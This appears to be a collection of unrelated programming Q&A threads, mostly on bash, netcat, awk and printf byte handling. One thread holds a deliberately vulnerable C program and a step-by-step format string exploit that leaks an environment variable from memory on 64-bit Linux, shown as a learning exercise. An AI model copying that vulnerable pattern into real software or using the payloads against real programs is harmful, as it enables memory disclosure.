How can I close a netcat connection after a certain character is returned in the response?

We have a very simple tcp messaging script that cats some text to a server port which returns and displays a response.
The part of the script we care about looks something like this:
cat someFile | netcat somehost 1234
The server's response is complete once we receive a certain character code (specifically 0x1C).
How can I close the connection when I receive this special character?
(Note: The server won't close the connection for me. While I currently just CTRL+C the script when I can tell it's done, I wish to be able to send many of these messages, one after the other.)
(Note: netcat -w x isn't good enough because I wish to push these messages through as fast as possible)

Create a bash script called client.sh:
#!/bin/bash
cat someFile
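while IFS= read -r FOO; do
    printf '%s\n' "$FOO" >&3
    # $'\x1c' is the literal 0x1C byte; a bash string cannot hold a NUL byte, so \x00 is not matched
    if [[ $FOO =~ $'\x1c' ]]; then
        break
    fi
done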
Then invoke netcat from your main script like so:
3>&1 nc -c ./client.sh somehost 1234
(You'll need bash version 3 for the regexp matching).
This assumes that the server is sending data in lines - if not you'll have to tweak client.sh so that it reads and echoes a character at a time.
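If the server does not end its messages with a newline, one option is to let bash's read builtin stop at the terminator byte itself instead of at a newline. A minimal sketch, assuming bash and assuming the terminator is the single byte 0x1C (the function name read_until_fs is made up for illustration):

```shell
#!/bin/bash
# Read stdin up to (not including) the first 0x1C byte and print it.
# -d $'\x1c' makes read stop at 0x1C instead of at a newline;
# IFS= and -r keep whitespace and backslashes intact.
read_until_fs() {
    local chunk
    IFS= read -r -d $'\x1c' chunk
    printf '%s\n' "$chunk"
}

# Stand-in for the server response: two lines, then 0x1C, then ignored data.
printf 'line one\nline two\034ignored' | read_until_fs
```

Inside client.sh this could take the place of the while loop, with the printf redirected to >&3.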

How about this?
Client side:
awk -v RS=$'\x1c' 'NR==1;{exit 0;}' < /dev/tcp/host-ip/port
Testing:
# server side test script
while true; do ascii -hd; done | { netcat -l 12345; echo closed...;}
# Generate 'some' data for testing & pipe to netcat.
# After netcat connection closes, echo will print 'closed...'
# Client side:
awk -v RS=J 'NR==1; {exit;}' < /dev/tcp/localhost/12345
# Changed end character to 'J' for testing.
# Didn't wish to write a server side script to generate 0x1C.
Client side produces:
0 NUL 16 DLE 32 48 0 64 # 80 P 96 ` 112 p
1 SOH 17 DC1 33 ! 49 1 65 A 81 Q 97 a 113 q
2 STX 18 DC2 34 " 50 2 66 B 82 R 98 b 114 r
3 ETX 19 DC3 35 # 51 3 67 C 83 S 99 c 115 s
4 EOT 20 DC4 36 $ 52 4 68 D 84 T 100 d 116 t
5 ENQ 21 NAK 37 % 53 5 69 E 85 U 101 e 117 u
6 ACK 22 SYN 38 & 54 6 70 F 86 V 102 f 118 v
7 BEL 23 ETB 39 ' 55 7 71 G 87 W 103 g 119 w
8 BS 24 CAN 40 ( 56 8 72 H 88 X 104 h 120 x
9 HT 25 EM 41 ) 57 9 73 I 89 Y 105 i 121 y
10 LF 26 SUB 42 * 58 : 74
After 'J' appears, server side closes & prints 'closed...', ensuring that the connection has indeed closed.
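Note that the client command above only reads from the socket. To also send someFile over the same connection, bash can open /dev/tcp read-write on a spare file descriptor. A hedged sketch, assuming bash (for /dev/tcp) and a 0x1C terminator; the function names are hypothetical, and the host, port, and file arguments are placeholders:

```shell
#!/bin/bash
# Print everything up to the first 0x1C byte on stdin, then stop reading.
first_record() {
    awk -v RS="$(printf '\034')" 'NR == 1 { print; exit }'
}

# Send a file to host:port and print the reply up to 0x1C.
# /dev/tcp/HOST/PORT is a bash feature, not a real file.
send_and_wait() {   # usage: send_and_wait HOST PORT FILE
    exec 3<>"/dev/tcp/$1/$2" || return 1
    cat "$3" >&3            # request
    first_record <&3        # reply, cut at the terminator
    exec 3>&-               # close the connection ourselves
}

# Local check of the record splitting, no network needed:
printf 'reply text\034trailing bytes' | first_record
```

A call such as send_and_wait somehost 1234 someFile could then be repeated in a loop, one message after the other.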

Try:
(cat somefile; sleep $timeout) | nc somehost 1234 | sed -e '{s/\x01.*//;T skip;q;:skip}'
This requires GNU sed.
How it works:
{
s/\x01.*//; # search for \x01, if we find it, kill it and the rest of the line
T skip; # goto label skip if the last s/// failed
q; # quit, printing current pattern buffer
:skip # label skip
}
Note that this assumes there will be a newline after \x01; sed won't see it otherwise, as sed operates line by line. The example matches \x01; for the character in the question, use \x1c instead.
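The same idea, adapted to the 0x1C terminator from the question, can be tried locally without a server. This is a sketch that assumes GNU sed (the T command and the \x1c escape are GNU extensions); the function name is illustrative only, and the commands are passed as separate -e arguments to sidestep label parsing differences:

```shell
# Print input lines until one contains 0x1C; print that line up to the
# terminator, then quit.
cut_at_fs() {
    sed -e 's/\x1c.*//' -e 'T skip' -e 'q' -e ':skip'
}

# Simulated response: 0x1C arrives in the middle of the second line.
printf 'first\nsecond\034junk\nthird\n' | cut_at_fs
```

With this input, the lines first and second are printed and sed exits before reading third.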

Maybe have a look at Ncat as well:
"Ncat is the culmination of many key features from various Netcat incarnations such as Netcat 1.x, Netcat6, SOcat, Cryptcat, GNU Netcat, etc. Ncat has a host of new features such as "Connection Brokering", TCP/UDP Redirection, SOCKS4 client and server supprt, ability to "Chain" Ncat processes, HTTP CONNECT proxying (and proxy chaining), SSL connect/listen support, IP address/connection filtering, plus much more."
http://nmap-ncat.sourceforge.net

This worked best for me. Just read the output with a while loop and check each line for the 0x1c byte using an if statement.
while IFS= read -r i; do
    if [[ $i == *$'\x1c'* ]]; then # Read until a line contains the 0x1c byte, then exit
        break
    fi
    echo "$i"
done < <(cat someFile | netcat somehost 1234)


Reading an environment variable using the format string vulnerability in a 64 bit OS

I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web; however, the examples that I've found only cover 32-bit Linux, and my desktop is running 64-bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
char string[1024];
if (argc < 2)
return 0;
strcpy( string, argv[1] );
printf( "vulnerable string: %s\n", string );
printf( string );
printf( "\n" );
}
After compiling that, I export my test variable and get its address. Then I pass the address to the program as a parameter, followed by a bunch of format specifiers in order to read from the stack:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?
So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter how I tried, putting the address before the format strings always got both mixed, so I moved the address to the back and added some padding of my own, so I could identify it and add more padding if needed.
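The mixing can be reproduced without the vulnerable program. A command-line argument cannot contain NUL bytes, so the two zero bytes that would complete the 8-byte address are missing, and the characters that follow the address (here '%1') take their place in the same 64-bit word. A small sketch, assuming a little-endian machine such as x86-64, an od that supports -tx8, and a printf that understands \x escapes (bash's builtin does); the function name is made up:

```shell
# The first 8 bytes of the argument from the question: the 6 address bytes
# followed by the first two characters of the format string, '%' and '1'.
first_word() {
    printf '\xcb\xef\xff\xff\xff\x7f%%1' | od -An -tx8 | tr -d ' \n'
    echo
}
first_word
```

On such a machine this prints 31257fffffffefcb, the value seen in the question: 0x25 and 0x31 are the codes for '%' and '1'.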
Also, Python and my environment don't get along with some escape sequences, so I ended up using a mix of the Python one-liner and printf. Note the extra '%': the outer printf treats a single '%' as the start of a format specifier, so it is doubled for this od check. Be sure to remove the extra '%' once you have verified the bytes with od/hexdump/whatever you prefer.
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' won't work, because the extra padding is needed ('%s|' is four characters shorter). So I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.

shell script to change directory to the tail result path

I'm using tail to watch for errors in a log, like this:
tail -f syschecklog.log | grep "ERROR processEvent: /mnt/docs/"
and this gives results like:
01.lnxp.com 2019-03-13 07:10:24, 345 ERROR processEvent: /mnt/docs/003217899/cfo paid ¿ inv -inc 1234321
So what I do manually is to change the path using cd:
cd /mnt/docs/003217899/
Is there any script to change directory automatically? I then run another script manually to rename the files contained in /003217899/. Directories like /003217899/ show up many times a day, and they change, so I need a script that automatically catches those errors, changes to the path, and then runs the file renaming script.
In addition to the above, some log lines include a further subfolder that contains the problem file, like /mnt/docs/003217899/attch/fees ¿ to be paid. How can we cd to that directory?
After Altering [Update]
grep "ERROR processEvent: /mnt/docs/" syschecklog.log | sed 's#.*ERROR processEvent: /mnt/docs/ \(/.*\)/.*#\1#' | while read -r DIR
do
BASEDIR=${DIR%/*}
if [ "$BASEDIR" != /mnt/docs/ ]
then
( cd "$BASEDIR" && find -type f -exec touch {} + | python -c 'import os, re; [os.rename(i, re.sub(r"\?", "¿", i)) for i in os.listdir(".")]' )
fi
# end of code for additional requirement
( cd "$DIR" && find -type f -exec touch {} + | python -c 'import os, re;
[os.rename(i, re.sub(r"\?", "¿", i)) for i in os.listdir(".")]' )
done
3rd script updated for renameFiles();
$ renameFiles()
> {
> # The next line is copied unchanged from the question. This could be improved.
> find -type f -exec touch {} + | python -c 'import os, re; [os.rename(i, re.sub(r"\?", "¿", i)) for i in os.listdir(".")]'
> }
$
$ # Two possible variants because the question was modified.
$ #
$ # To process the complete input file as it is now
$ # grep "ERROR processEvent: /mnt/docs/" syschecklog.log | ...
$ #
$ # To continuously follow the file
$ # tail -f /mnt/docs/syschecklog.log | grep "ERROR processEvent: /mnt/docs/" | ...
$
$ grep "ERROR processEvent: /mnt/docs/" syschecklog.log | sed 's#.*ERROR processEvent: \(/.*\)/.*#\1#' | while read -r DIR
> do
> # additional requirement from comment: if DIR is /mnt/docs/003217899/attch
> # the script should be run both in .../003217899 and .../attch
> BASEDIR=${DIR%/*}
> if [ "$BASEDIR" != /mnt/docs/ ]
> then
> ( cd "$BASEDIR" && renameFiles)
> fi
> # end of code for additional requirement
> ( cd "$DIR" && renameFiles)
> done
-bash: cd: /mnt/docs/001234579/Exp8888861¿_Applicant_Case_Conference_l (No such file or directory): No such file or directory
-bash: cd: /mnt/docs/001888579/¿_SENIOR_RESOLUTION_MANAGER_i(No such file or directory): No such file or directory
-bash: cd: /mnt/docs/001234579/Exp2222276¿18 from all and Treatments Inc. February 27_ 20199999(No such file or directory): No such file or directory
grep results as you requested;
grep "ERROR processEvent: /mnt/docs/" syschecklog.log
01.lnxp.com 3 2019-03-14 07:04:30,446 ERROR processEvent: /mnt/docs/001111224/Exposure2178861/Email_from_LAT__18_009945_AABS¿__Summary_not_received12128050 (No such file or directory)
01.lnxp.com 3 2019-03-14 07:05:13,137 ERROR processEvent: /mnt/docs/001567890/Coop_subro_question__TO__ZED_LANDERS_¿_SENIOR__Basse12130781 (No such file or directory)
01.lnxp.com 3 2019-03-14 07:05:19,914 ERROR processEvent: /mnt/docs/001323289/Exposure2622276/OCF¿18 from All and Treatments Inc. February 27_ 201912129762 (No such file or directory)
Results of Locale
$ locale
LANG=en_CA.UTF-8
LC_CTYPE="en_CA.UTF-8"
LC_NUMERIC="en_CA.UTF-8"
LC_TIME="en_CA.UTF-8"
LC_COLLATE="en_CA.UTF-8"
LC_MONETARY="en_CA.UTF-8"
LC_MESSAGES="en_CA.UTF-8"
LC_PAPER="en_CA.UTF-8"
LC_NAME="en_CA.UTF-8"
LC_ADDRESS="en_CA.UTF-8"
LC_TELEPHONE="en_CA.UTF-8"
LC_MEASUREMENT="en_CA.UTF-8"
LC_IDENTIFICATION="en_CA.UTF-8"
LC_ALL=
Results of fgrep python yourscript | od -c -tx1
$ fgrep python invert.sh | od -c -tx1
0000000 f i n d - t y p e
20 20 20 20 66 69 6e 64 20 20 2d 74 79 70 65 20
0000020 f - e x e c t o u c h {
66 20 20 2d 65 78 65 63 20 74 6f 75 63 68 20 7b
0000040 } + | p y t h o n - c
7d 20 2b 20 7c 20 70 79 74 68 6f 6e 20 2d 63 20
0000060 ' i m p o r t o s , r e ;
27 69 6d 70 6f 72 74 20 6f 73 2c 20 72 65 3b 20
0000100 [ o s . r e n a m e ( i , r e
5b 6f 73 2e 72 65 6e 61 6d 65 28 69 2c 20 72 65
0000120 . s u b ( r " \ ? " , " 302 277 "
2e 73 75 62 28 72 22 5c 3f 22 2c 20 22 c2 bf 22
0000140 , i ) ) f o r i i n o
2c 20 69 29 29 20 66 6f 72 20 69 20 69 6e 20 6f
0000160 s . l i s t d i r ( " . " ) ] '
73 2e 6c 69 73 74 64 69 72 28 22 2e 22 29 5d 27
0000200 \n
0a
0000201
I need to change each '?' in the file name to '¿': the system creates '?' but it shows as '¿', so I have to change it to something the server can understand.
I found that a capital A with a circumflex (Â) appears by itself in the script when I display it with cat:
cat invert.sh
#!/bin/bash
renameFiles()
{
find -type f -exec touch {} + | python -c 'import os, re; [os.rename(i, re.sub(r"\?", "¿", i)) for i in os.listdir(".")]'
}
grep "ERROR processEvent: /mnt/docs/" syschecklog.log | sed 's#.*ERROR processEvent: /mnt/docs/ \(/.*\)/.*#\1#' | while read -r DIR
do
BASEDIR=${DIR%/*}
if [ "$BASEDIR" != /mnt/cc-docs ]
then
( cd "$BASEDIR" && renameFiles)
fi
( cd "$DIR" && renameFiles)
Results of od -c -tx1 on the error file:
echo *|od -c -tx1
0000000 O C F - 2 1 I n v 2 0 8 3 5
4f 43 46 2d 32 31 20 49 6e 76 20 32 30 38 33 35
0000020 9 9 A s s e s s M e d $ 6 2
39 39 20 41 73 73 65 73 73 4d 65 64 20 24 36 32
0000040 1 . 5 0 ( H a n g Q ) ?
31 2e 35 30 20 28 48 61 6e 67 20 51 29 20 3f 20
0000060 d t d F e b 2 7 _ 2 0 1 9
64 74 64 20 46 65 62 20 32 37 5f 20 32 30 31 39
0000100 1 2 1 7 4 5 8 3 \n
31 32 31 37 34 35 38 33 0a
0000111
I checked the system: when using echo with the hex encoding of ¿, it attaches an Â to it, as below:
$echo -e '\xc2\xbf'
¿
Script modified again for additional requirements.
(As I did not get answers to all questions I modified the script based on the incomplete information.)
Instead of processing two directories separately the script now uses find in the parent directory (or the only directory), renames and touches all files that contain a '?' in the name. (-name '*\?*').
#! /bin/bash
# Two possible variants because the question was modified.
#
# To process the complete input file as it is now
# fgrep "ERROR processEvent: /mnt/docs/" syschecklog.log | ...
#
# To continuously follow the file
# tail -f syschecklog.log| fgrep "ERROR processEvent: /mnt/docs/" | ...
# The "LANG=C sed ..." avoids problems with invalid UTF-8 characters that do not match '.' in sed's pattern
fgrep "ERROR processEvent: /mnt/docs/" syschecklog.log | LANG=C sed 's#.*ERROR processEvent: \(/mnt/docs/[^/]*\)/.*#\1#' | while IFS= read -r DIR
do
find "$DIR" -name '*\?*' | while IFS= read -r FILE
do
NEW=$(echo "$FILE"| tr '?' $'\xBF')
mv "$FILE" "$NEW"
touch "$NEW"
done
done
Note that grep and sed will switch to buffered output when used in a pipeline. This will delay the processing of the extracted lines. You might have to disable buffering for the commands in the pipeline, see http://mywiki.wooledge.org/BashFAQ/009
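As a rough illustration of the extraction step with buffering disabled, the sketch below assumes GNU grep and GNU sed, whose --line-buffered and -u options flush after every line. LC_ALL=C is used instead of LANG=C because LC_ALL takes precedence if it happens to be set. The function name extract_dirs is made up for this example:

```shell
# Read log lines on stdin, print the /mnt/docs/<id> directory of each error.
extract_dirs() {
    grep -F --line-buffered 'ERROR processEvent: /mnt/docs/' |
        LC_ALL=C sed -u 's#.*ERROR processEvent: \(/mnt/docs/[^/]*\)/.*#\1#'
}

# One of the sample log lines from the question:
echo '01.lnxp.com 3 2019-03-14 07:05:13,137 ERROR processEvent: /mnt/docs/001567890/Coop_subro_question__TO__ZED_LANDERS_¿_SENIOR__Basse12130781 (No such file or directory)' | extract_dirs
```

For the sample line this prints /mnt/docs/001567890. For continuous monitoring, the function could be fed from tail -f syschecklog.log and its output read by the while IFS= read -r DIR loop.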
2nd major update
There was a problem with invalid characters. In a UTF-8 environment sed behaves strangely when the input contains bytes that are not valid UTF-8 characters: the pattern . does not match these invalid bytes. (The example file contains a byte with the value 0xBF. See http://www.linuxproblem.org/art_21.html.) Setting LANG=C for the sed command fixes this problem.
I tested my script with the grep output added to the question. I wrote this into a file somelog.log. I modified my script to use grep pattern somelog.log | ... with a local file instead of using a log file with a full path which does not exist on my test system.
After adding LANG=C to the sed command the script ran successfully with the raw input file provided as an external link.
The output is
$ grep "ERROR processEvent: /mnt/docs/" syschecklog.log | sed 's#.*ERROR processEvent: \(/.*\)/.*#\1#' | while read -r DIR; do BASEDIR=${DIR%/*}; if [ "$BASEDIR" != /mnt/docs/ ]; then ( cd "$BASEDIR" && renameFiles); fi; ( cd "$DIR" && renameFiles); done
bash: cd: /mnt/docs/001234567: No such file or directory
bash: cd: /mnt/docs/001234567/Subdir9876543: No such file or directory
bash: cd: /mnt/docs/002345678: No such file or directory
bash: cd: /mnt/docs/003456789: No such file or directory
bash: cd: /mnt/docs/003456789/Subdir8765432: No such file or directory
... (more similar lines removed)
You can see that it tried to cd into the directories from the log messages. It does not show parts of the file name. In my case it simply failed because the directories don't exist. I think the script should work.
After replacing the two cd and renameFiles commands with find... the output with my test is
find: ‘/mnt/docs/001234567’: No such file or directory
find: ‘/mnt/docs/002345678’: No such file or directory
find: ‘/mnt/docs/003456789’: No such file or directory
...

find length of a fixed width file with a little twist

Hi Wonderful People/My Gurus and all kind-hearted people.
I have a fixed-width file and I'm trying to find the rows that do not contain the expected number of bytes. I tried a couple of awk commands, but they are not giving me the result I want. Each record should be 208 bytes, but a few rows are not. I'm trying to find those records that don't have 208 bytes.
This command gave me the length of the first line:
awk '{print length;exit}' file.text
Here I tried to print the rows that contain 101 bytes, but it didn't work:
awk '{print length==101}' file.text
Any help/insights here would be highly helpful
With awk:
awk 'length() != 208' file
Note that length() gives you the number of characters, not bytes. The two can differ when the input contains multibyte (for example UTF-8) characters. You can set the locale to C to force awk to count bytes (use LC_ALL=C instead if LC_ALL is set, since it takes precedence over LANG):
LANG=C awk 'length() != 208' file
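To see which records are off and by how much, the line number and length can be printed as well. A minimal sketch in awk, assuming byte counting is wanted (hence LC_ALL=C); the function name and the width parameter are illustrative:

```shell
# Print "line-number: length" for every line whose byte length differs
# from the expected record width.
report_bad_lengths() {   # usage: report_bad_lengths WIDTH FILE
    LC_ALL=C awk -v width="$1" 'length($0) != width { print NR ": " length($0) }' "$2"
}

# Example with a tiny file and a width of 5 instead of 208:
tmp=$(mktemp)
printf 'abcde\nabc\nabcdefg\nvwxyz\n' > "$tmp"
report_bad_lengths 5 "$tmp"
rm -f "$tmp"
```

For the real file the call would be report_bad_lengths 208 file.text.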
Perl to the rescue!
perl -lne 'print "$.:", length if length != 208' -- file.text
-n reads the input line by line
-l removes newlines from the input before processing it and adds them to print
The one-liner will print line number ($.) and the length of the line for each line whose length is different than 208.
if you're using gawk, then it's no issue, even in typical UTF-8 locale mode :
length(s) = # chars native to locale,
# typically that means # utf-8 chars
match(s, /$/) - 1 = # raw bytes # this also work for pure-binary
# inputs, without triggering
# any error messages in gawk Unicode mode
Best illustrated by example :
0000000 3347498554 3381184647 3182945161 171608122
: Ɔ ** LJ ** Ȉ ** ɉ ** 㷽 ** ** : 210 : \n
072 306 206 307 207 310 210 311 211 343 267 275 072 210 072 012
: ? 86 ? 87 ? 88 ? 89 ? ? ? : 88 : nl
58 198 134 199 135 200 136 201 137 227 183 189 58 136 58 10
3a c6 86 c7 87 c8 88 c9 89 e3 b7 bd 3a 88 3a 0a
0000020
# gawk profile, created Sat Oct 29 20:32:49 2022
BEGIN {
1 __ = "\306\206\307\207\310" (_="\210") \
"\311\211\343\267\275"
1 print "",__,_
1 STDERR = "/dev/stderr"
1 print ( match(_, /$/) - 1, "_" ) > STDERR # *A
1 print ( length(__), match(__, /$/) - 1 ) > STDERR # *B
1 print ( (__~_), match(__, (_) ".*") ) > STDERR # *C
1 print ( RSTART, RLENGTH ) > STDERR # *D
}
1 | _ *A # of bytes off "_" because it was defined as 0x88 \210
5 | 11 *B # of chars of "__", and
# of bytes of it :
# 4 x 2-byte UC
# + 1 x 3-byte UC = 11
1 | 3 *C # does byte \210 exist among larger string (true/1),
# and which unicode character is 1st to
# contain \210 - the 3rd one, by original definition
3 | 3 *D # notice I also added a ".*" to the tail of this match() :
# if the left-side string being tested is valid UTF-8,
# then this will match all the way to the end of string,
# inclusive, in which you can deduce :
#
# "\210 first appeared in 3rd-to-last utf-8 character"
Combining that inferred understanding :
RLENGTH = "3 chars to the end, inclusive",
with knowledge of how many to its left :
RSTART - 1 = "2 chars before",
yields a total count of 3 + 2 = 5, affirming length()'s result

Emitting a character (or multi-byte binary string) by integer ordinal in bash

I'm trying to echo integer in bash as is, without converting each digit to ASCII and outputting corresponding sequence. e.g.
echo "123" | hd
00000000 31 32 33 0a |123.|
it's outputting ASCII codes of each character. How can I output 123 itself, as unsigned integer for example? so that I get something like
00000000 0x7B 00 00 00
That's a job for printf
$ printf "\x$(printf '%x' "123")" | hd
00000000 7b |{|
The inner printf converts the decimal number 123 to hexadecimal, and the outer printf uses \x to create a byte with that value.
If you want several bytes, use this:
$ printf '%b' "$(printf '\\x%x' "123" "96" "68")" | hd
00000000 7b 60 44 |{`D|
Or, if you want to use hexadecimal:
$ printf '%b' "$(printf '\\x%x' "0x7f" "0xFF" "0xFF")" | hd
00000000 7f ff ff |...|
Or, in this case, simply:
$ printf '\x7f\xFF\xFF' | hd
00000000 7f ff ff |...|
You have to be careful about endianness. x86 is little-endian, so you must store the least significant byte first.
As an example, if you want to store the 32-bit integer 2'937'252'660d = AF'12'EB'34h on disk, you have to write 0x34, then 0xEB, then 0x12 and then 0xAF, in that order.
I use this helper for the same purpose as yours:
printf "%.8x\n" 2937252660 | fold -b -w2 | tac | while read a; do echo -e -n "\\x${a}"; done
printf converts from decimal to hexadecimal (padded to 8 digits, i.e. 4 bytes)
fold splits into groups of 2 characters, i.e. 1 byte
tac reverses the lines (this is where little-endian is applied)
the while loop echoes one raw byte at a time
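The pipeline can be checked by reading the bytes back with od. This sketch wraps it in a function (the name is hypothetical), pads to eight hex digits so that small values still yield four bytes, and assumes bash's printf, GNU fold and tac, and a little-endian machine for the od -tu4 round trip:

```shell
#!/bin/bash
# Hypothetical helper: emit a 32-bit value as four little-endian bytes.
emit_uint32_le() {
    printf '%.8x\n' "$1" | fold -b -w2 | tac | while read -r byte; do
        printf "\\x$byte"    # format string becomes \xHH, i.e. one raw byte
    done
}

emit_uint32_le 2937252660 | od -An -tx1   # the bytes in stored order
emit_uint32_le 2937252660 | od -An -tu4   # read back as a native uint32
```

The first od call should list 34 eb 12 af, and on a little-endian machine the second should give back 2937252660.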
Borrowing the observation from @Setop's answer that the examples imply that the OP wants uint32s, but trying to build a more efficient implementation (involving no subshells or external commands):
print_byte() {
local val
printf -v val '%02x' "$1"
printf '%b' "\x${val}"
}
print_uint32() {
print_byte "$(( ( $1 / (( 256 ** 0 )) ) % 256 ))"
print_byte "$(( ( $1 / (( 256 ** 1 )) ) % 256 ))"
print_byte "$(( ( $1 / (( 256 ** 2 )) ) % 256 ))"
print_byte "$(( ( $1 / (( 256 ** 3 )) ) % 256 ))"
}
Thus:
print_uint32 32 | xxd # this should be a single space, padded with nulls
...correctly yields:
00000000: 2000 0000 ...
...as demonstrated by reversing it back to the original value with Python's struct.unpack() function:
$ print_uint32 32 |
> python3 -c 'import struct, sys; print(struct.unpack("<I", sys.stdin.buffer.read())[0])'
32

Selecting one value per row - awk

I have a file formatted like:
10.0.0.1 87.220.150.64 131
10.0.0.1 87.220.172.219 131
10.0.0.1 87.220.74.162 131
10.0.0.1 87.220.83.17 58
10.0.0.1 87.220.83.17 58
1.160.138.209 10.0.0.249 177
1.160.138.209 10.0.0.249 354
1.160.138.249 10.0.0.124 296
1.160.139.125 10.0.0.252 129
1.160.139.207 10.0.0.142 46
The first and the second columns are IP addresses and the third one is the bytes transferred between IPs. I have to count how many bytes each 10.something IP-address has sent or received.
I used the following awk program to calculate how many bytes each IP had sent, but I can't figure out how to edit it to also calculate the received bytes.
awk '{ a[$1 " " $2] += $3 } END { for (i in a) { print i " " a[i] } }' input.txt | sort -n
This doesn't distinguish between bytes sent and bytes received.
# bytes-txrx.awk -- print bytes sent or received by each 10.* ip address.
# Does not guard against overflow.
#
# Input file format:
# 10.0.0.1 87.220.150.64 131
# 10.0.0.1 87.220.172.219 131
# 10.0.0.1 87.220.74.162 131
# 10.0.0.1 87.220.83.17 58
# 10.0.0.1 87.220.83.17 58
# 1.160.138.209 10.0.0.249 177
# 1.160.138.209 10.0.0.249 354
# 1.160.138.249 10.0.0.124 296
# 1.160.139.125 10.0.0.252 129
# 1.160.139.207 10.0.0.142 46
#
$1 ~ /^10\./ {a[$1] += $3;}
$2 ~ /^10\./ {a[$2] += $3;}
END {
for (key in a) {
print key, a[key];
}
}
$ awk -f bytes-txrx.awk input.txt
10.0.0.1 509
10.0.0.252 129
10.0.0.249 531
10.0.0.142 46
10.0.0.124 296
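If sent and received bytes are wanted separately rather than as one total, two arrays can be kept. A sketch along the same lines, assuming column 1 is the sender and column 2 the receiver; the function name, the array names, and the three-column output layout are assumptions, not part of the original answer:

```shell
# Print "ip sent received" for every 10.* address, sorted by address text.
txrx() {   # usage: txrx [FILE...]   (reads stdin when no file is given)
    awk '
        $1 ~ /^10\./ { tx[$1] += $3; seen[$1] }   # column 1 is the sender
        $2 ~ /^10\./ { rx[$2] += $3; seen[$2] }   # column 2 is the receiver
        END { for (ip in seen) print ip, tx[ip] + 0, rx[ip] + 0 }
    ' "$@" | sort
}

# A few rows from the question:
printf '%s\n' \
    '10.0.0.1 87.220.83.17 58' \
    '10.0.0.1 87.220.83.17 58' \
    '1.160.138.209 10.0.0.249 177' \
    '1.160.138.209 10.0.0.249 354' | txrx
```

For these four rows, 10.0.0.1 shows 116 bytes sent and 0 received, and 10.0.0.249 shows 0 sent and 531 received.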
Just sort by column 2 and you have it:
$ awk '{ a[$1 " " $2] += $3 } END { for (i in a) { print i " " a[i] } }' input.txt | sort -n -k 2
But your description does not match the calculation. You do not calculate how much an IP sends; you calculate how much is sent from A to B. And the amount A sends is the same as the amount B receives.
